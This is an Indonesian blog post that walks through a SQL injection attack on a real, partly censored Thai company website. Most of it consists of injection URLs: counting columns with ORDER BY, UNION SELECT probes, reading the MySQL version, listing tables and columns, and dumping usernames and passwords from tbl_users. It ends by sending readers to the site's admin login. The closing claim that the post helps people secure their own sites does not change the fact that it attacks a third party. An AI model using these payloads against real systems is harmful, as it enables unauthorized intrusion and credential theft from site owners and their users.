langsung saja tidak perlu basa basi lagi
target disini adalah WWW.(SENSOR)THAILAND.CO.TH
maaf, disensor websitenya untuk keselamatan pihak pemilik website tersebut
setelah kita explore beberapa page, saya disini ambil part ini untuk dicari titik kelemahannya..
kamu klik link dibawah ini :
http://www.(sensor)thailand.co.th/activities_01.php?activity_id=31
sekarang kita masukkan minus atau tanda petik satu, jadi seperti dibawa ini :
http://www.(sensor)thailand.co.th/activities_01.php?activity_id='31
Sekarang kita lanjutkan dengan mengecek jumlah kolom dari web ini dengan perintah "order+by". Disini kita harus mengurutkan angka "1" sampai akhir hingga menampilkan error seperti ini:
http://www.(sensor)thailand.co.th/activities_01.php?activity_id=31+order+by+1--
status = NORMAL
http://www.(sensor)thailand.co.th/activities_01.php?activity_id=31+order+by+2--
status = NORMAL
http://www.(sensor)thailand.co.th/activities_01.php?activity_id=31+order+by+3--
status = NORMAL
http://www.(sensor)thailand.co.th/activities_01.php?activity_id=31+order+by+4--
status = NORMAL
http://www.(sensor)thailand.co.th/activities_01.php?activity_id=31+order+by+5--
status = NORMAL
http://www.(sensor)thailand.co.th/activities_01.php?activity_id=31+order+by+6--
status = ERROR
NB : Perlu di ingat pengurutan ini dimulai dari angka 1 sampai tampilan error/blank, dan seterusnya ya.. ok tarik nafas dulu hahaha..
Setelah itu kita cek column yang bermasalah dengan perintah
"union+all+select" atau "union+select" seperti ini:
http://www.(sensor)thailand.co.th/activities_01.php?activity_id=-31+union+all+select+1,2,3,4,5--
Oh iya kita harus menambahkan tanda minus " - " pada akhir id content seperti ini: "activity_id=-31"
Setelah itu akan muncul tampilan yang menampilkan kolom yang bermasalah seperti ini :
Muncul angka 2 - 3 yang tebal seperti diatas, angka inilah yang nantinya kita gunakan sebagai referensi.
Sekarang kita mengecek versi dari MySQL yang dipakai di web ini dengan menambahkan sintak "version()" atau "@@version" pada kolom yang bermasalah tadi seperti ini:
http://www.(sensor)thailand.co.th/activities_01.php?activity_id=-31+union+all+select+1,2,version(),4,5--
Sekarang kita lanjutkan dengan menampilkan table-table dengan perintah "...group_concat(table_name)...+from+information_schema.tables+where+table_schema=database()"
http://www.(sensor)thailand.co.th/activities_01.php?activity_id=-31+union+all+select+1,2,group_concat(table_name),4,5+from+information_schema.tables+where+table_schema=database()
Setelah table sudah ada sekarang kita akan mengeluarkan column dari table tersebut dengan perintah "...group_concat(column_name)...+information_schema.columns+where+table_name=[nama hex sql table], pilihlah table yang akan ditampilkan column nya, disini ane memilih table tbl_users seperti ini:
http://www.(sensor)thailand.co.th/activities_01.php?activity_id=-31+union+all+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_name=0x74626c5f7573657273
0x74626c5f7573657273 atau tbl_user setelah di mysql hex encode. Untuk meng-convert menjadi mysql hex dapat menggunakan web ini: http://www.waraxe.us/sql-char-encoder.html
Sekarang kita akan mengeluarkan isi dari column c_username dan c_password dengan perintah "...group_concat(namakolom yang diinginkan,0x3a,namakolom yang diinginkan)...+from+nama tabel--
seperti ini:
http://www.(sensor)thailand.co.th/activities_01.php?activity_id=-31+union+all+select+1,2,group_concat(c_username,0x3a,c_password,0x3a),4,5+from+tbl_users--
kalian sudah dapat username dan passwordnya jadi sekarang tunggu apa lagi, jadi PAGE ADMINnya
halaman admin >> http://www.(sensor)thailand.co.th/admin/
Semoga bermanfaat dan semoga dengan kita memahami cara SQL INJECTION ini kita bisa mengamankan website kita.. terima kasih ^^

Bos saya dah pasang Banner mu... dtnggu link backnya
ReplyDelete:D
_____________
Dinasti-Asong
Post a Comment